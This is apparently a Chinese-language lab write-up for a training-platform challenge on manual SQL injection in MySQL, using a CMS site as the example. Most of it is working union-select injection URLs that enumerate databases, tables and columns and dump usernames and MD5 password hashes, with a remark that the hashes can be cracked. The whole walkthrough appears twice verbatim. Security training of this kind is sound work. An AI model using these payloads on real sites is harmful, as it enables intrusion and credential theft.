墨者學院-SQL手工注入漏洞測試(MySQL資料庫)

此題很簡單，可以完全參照

https://blog.csdn.net/qq_42357070/article/details/81215715

進行解題

以下用cms站點舉例：

https://pan.baidu.com/s/1uiO2cqZCGquQqyYWr0C7WQ

 

 

提交and 1=1 返回內容正常

       And 1=2 返回內容為空

確定存在注入漏洞且為數字型

 

通過sql語句中的order by N逐個嘗試，返回內容正常，可以確定欄位少15個

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15

通過SQL語句中and 1=2 union select 1,2,3……,n聯合查詢，判斷顯示的是哪些欄位，就是原本顯示標題和內容時候的查詢欄位，title標題是第2個位置顯示，contents內容是在

第3個位置顯示。

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,DATABASE(),4,5,6,7,8,9,10,VERSION(),12,13,14,15

 

在原來的標題上位置顯示為資料庫名稱cms，內容的位置顯示為5.5.53資料庫版本號。

這裡是這2個內容分別顯示在第2、3的位置

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,SCHEMA_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1

查詢資料庫報錯。

illegal mix of collations for operation 'UNION'

找到解決方法是：convert(#需求# using latin1)

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(SCHEMA_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1

重複操作得到以下七個資料庫：

cmc,information_schema,mysql,zzcms,test,performance_shema,dvwa

 

 

進入cms資料庫下找到當前資料庫使用者資訊表

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(TABLE_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27cms%27%20limit%207,1

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(COLUMN_NAME%20using%20latin1),4,5,6,7,8,9,10,convert(COLUMN_TYPE%20using%20latin1),12,13,14,15%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=%27cms%27%20%20and%20TABLE_NAME=%27cms_users%27%20limit%200,1

重複操作得到cms_users的三個欄位及字元型

userid，username，password

 

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(CONCAT(userid,%27-%27,username,%27-%27,password)%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20cms.cms_users limit 0,1

查詢資料庫cms的表cms_users中資料的userid，username，password的內容，

三者之間用-連線起來，CONCAT的是把產生的字串連線起來，這個地方拼接在一起時為了在一個地方全部顯示出來。可以獲得兩個使用者及密碼（md5加密後的密碼，可通過解密獲到明文）

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(CONCAT(userid,%27-%27,username,%27-%27,password)%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20cms.cms_users limit 1,1

 

 

提交and 1=1 返回內容正常

       And 1=2 返回內容為空

確定存在注入漏洞且為數字型

 

通過sql語句中的order by N逐個嘗試，返回內容正常，可以確定欄位少15個

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15

通過SQL語句中and 1=2 union select 1,2,3……,n聯合查詢，判斷顯示的是哪些欄位，就是原本顯示標題和內容時候的查詢欄位，title標題是第2個位置顯示，contents內容是在

第3個位置顯示。

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,DATABASE(),4,5,6,7,8,9,10,VERSION(),12,13,14,15

 

在原來的標題上位置顯示為資料庫名稱cms，內容的位置顯示為5.5.53資料庫版本號。

這裡是這2個內容分別顯示在第2、3的位置

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,SCHEMA_NAME,4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1

查詢資料庫報錯。

找到解決方法是：convert(#需求# using latin1)

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(SCHEMA_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.SCHEMATA%20limit%200,1

重複操作得到以下七個資料庫：

cmc,information_schema,mysql,zzcms,test,performance_shema,dvwa

 

 

進入cms資料庫下找到當前資料庫使用者資訊表

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(TABLE_NAME%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27cms%27%20limit%207,1

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(COLUMN_NAME%20using%20latin1),4,5,6,7,8,9,10,convert(COLUMN_TYPE%20using%20latin1),12,13,14,15%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=%27cms%27%20%20and%20TABLE_NAME=%27cms_users%27%20limit%200,1

重複操作得到cms_users的三個欄位及字元型

userid，username，password

 

 

 

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(CONCAT(userid,%27-%27,username,%27-%27,password)%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20cms.cms_users limit 0,1

查詢資料庫cms的表cms_users中資料的userid，username，password的內容，

三者之間用-連線起來，CONCAT的是把產生的字串連線起來，這個地方拼接在一起時為了在一個地方全部顯示出來。可以獲得兩個使用者及密碼（md5加密後的密碼，可通過解密獲到明文）

http://www.ttcms.com/show.php?id=35%20and%201=2%20union%20select%201,2,convert(CONCAT(userid,%27-%27,username,%27-%27,password)%20using%20latin1),4,5,6,7,8,9,10,11,12,13,14,15%20from%20cms.cms_users limit 1,1

 

 

盲注是真的煎熬，，，嚶嚶嚶。。。

 

盲注是真的煎熬，，，嚶嚶嚶。。。